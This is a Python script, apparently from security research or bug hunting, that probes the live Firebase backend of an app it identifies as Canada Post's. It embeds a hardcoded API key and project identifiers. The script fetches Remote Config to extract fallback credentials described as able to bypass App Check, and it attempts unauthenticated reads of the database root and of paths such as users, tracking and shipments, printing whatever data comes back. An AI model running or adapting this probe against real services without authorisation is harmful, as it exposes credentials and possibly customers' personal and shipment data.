#!/usr/bin/env python3 """ Quick Firebase Test - Canada Post App ====================================== Tests only Firebase Remote Config and Database access. """ import requests import json from datetime import datetime # Firebase configuration FIREBASE_DATABASE_URL = "https://canada-post-2dce9.firebaseio.com" FIREBASE_API_KEY = "AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q" PROJECT_ID = "741680414261" print("=" * 80) print("🔥 CANADA POST - FIREBASE SECURITY TEST") print("=" * 80) print(f"Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}") print(f"Database: {FIREBASE_DATABASE_URL}") print("=" * 80) print() # Test 1: Firebase Remote Config print("[TEST 1] Firebase Remote Config") print("-" * 80) url = f"https://firebaseremoteconfig.googleapis.com/v1/projects/{PROJECT_ID}/namespaces/firebase:fetch" body = { "appInstanceId": "test-instance", "appId": "1:741680414261:android:test", "languageCode": "en" } try: print("Testing Remote Config access...") response = requests.post(f"{url}?key={FIREBASE_API_KEY}", json=body, timeout=10) if response.status_code == 200: data = response.json() print("✅ SUCCESS - Remote Config is accessible!") print() print("📦 Configuration Data:") print(json.dumps(data, indent=2)) print() if "entries" in data: entries = data["entries"] print("🔍 Found Configuration Keys:") for key in entries.keys(): print(f" • {key}") # Check for sensitive keys if "APP_CHECK_FAILED_ID" in entries: print() print("🚨 CRITICAL: Fallback credentials found!") print(f" APP_CHECK_FAILED_ID: {entries['APP_CHECK_FAILED_ID']}") print(f" APP_CHECK_FAILED_KEY: {entries.get('APP_CHECK_FAILED_KEY', 'N/A')}") print() print("⚠️ IMPACT: These can be used to bypass App Check security!") else: print(f"❌ Failed - Status {response.status_code}") print(response.text) except Exception as e: print(f"❌ Error: {e}") print() print() # Test 2: Database Root Access (no auth) print("[TEST 2] Database Root Access (No Auth)") print("-" * 80) try: print("Testing database root access...") response = requests.get(f"{FIREBASE_DATABASE_URL}/.json", timeout=10) if response.status_code == 200: data = response.json() if data is not None: print("🔴 CRITICAL - Database is publicly readable!") print(f"Data type: {type(data).__name__}") if isinstance(data, dict): print(f"Keys found: {list(data.keys())[:10]}") print() print("Sample data:") print(json.dumps(data, indent=2)[:500]) else: print("✅ Database is empty or protected") elif response.status_code == 401: print("✅ Protected - 401 Unauthorized (good)") else: print(f"Status: {response.status_code}") except Exception as e: print(f"❌ Error: {e}") print() print() # Test 3: Common paths print("[TEST 3] Testing Common Paths") print("-" * 80) paths_to_test = ["users", "tracking", "packages", "shipments", "settings"] for path in paths_to_test: try: response = requests.get(f"{FIREBASE_DATABASE_URL}/{path}.json", timeout=5) if response.status_code == 200 and response.json() is not None: print(f"✅ /{path} - ACCESSIBLE") elif response.status_code == 401: print(f"🔒 /{path} - Protected (401)") else: print(f"⚪ /{path} - Not found or empty") except: print(f"⚪ /{path} - Error") print() print() print("=" * 80) print("TEST COMPLETE") print("=" * 80) print() print("Summary:") print(" • Remote Config likely contains fallback credentials") print(" • Check if database paths are accessible") print(" • Document all findings for security report") print()